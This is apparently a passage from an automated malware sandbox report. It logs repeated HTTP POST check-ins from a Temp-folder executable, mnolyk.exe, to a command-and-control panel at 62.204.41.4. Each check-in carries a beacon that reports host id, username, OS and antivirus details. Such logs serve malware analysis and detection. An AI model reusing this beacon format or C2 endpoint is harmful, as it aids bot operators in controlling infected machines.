                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:27.954535961 CET456INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    256192.168.2.34995862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:28.145173073 CET456OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:28.210447073 CET457INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    257192.168.2.34995962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:28.422446966 CET457OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:28.485539913 CET458INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    258192.168.2.34996062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:28.668791056 CET458OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:28.731478930 CET459INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    259192.168.2.34996162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:28.958110094 CET459OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:29.022146940 CET460INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    26192.168.2.34972862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:23.125329971 CET227OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:23.190443993 CET227INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    260192.168.2.34996262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:29.257081032 CET460OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:29.324227095 CET461INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    261192.168.2.34996362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:29.504400969 CET461OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:29.568942070 CET462INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    262192.168.2.34996462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:29.755517960 CET462OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:29.820144892 CET463INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    263192.168.2.34996562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:30.025254965 CET463OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:30.089925051 CET464INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    264192.168.2.34996662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:30.274781942 CET464OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:30.337826014 CET465INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    265192.168.2.34996762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:30.528686047 CET465OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:30.592782021 CET466INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    266192.168.2.34996862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:30.770420074 CET466OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:30.833966017 CET467INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    267192.168.2.34996962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:31.022856951 CET467OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:31.088211060 CET468INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    268192.168.2.34997062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:31.302961111 CET468OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:31.366622925 CET469INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    269192.168.2.34997162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:31.549737930 CET469OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:31.611403942 CET470INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    27192.168.2.34972962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:23.382591963 CET228OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:23.446644068 CET228INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    270192.168.2.34997262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:32.067364931 CET470OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:32.132452011 CET471INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    271192.168.2.34997362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:32.423801899 CET471OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:32.487102985 CET472INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    272192.168.2.34997462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:32.751955986 CET472OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:32.816646099 CET473INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    273192.168.2.34997562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
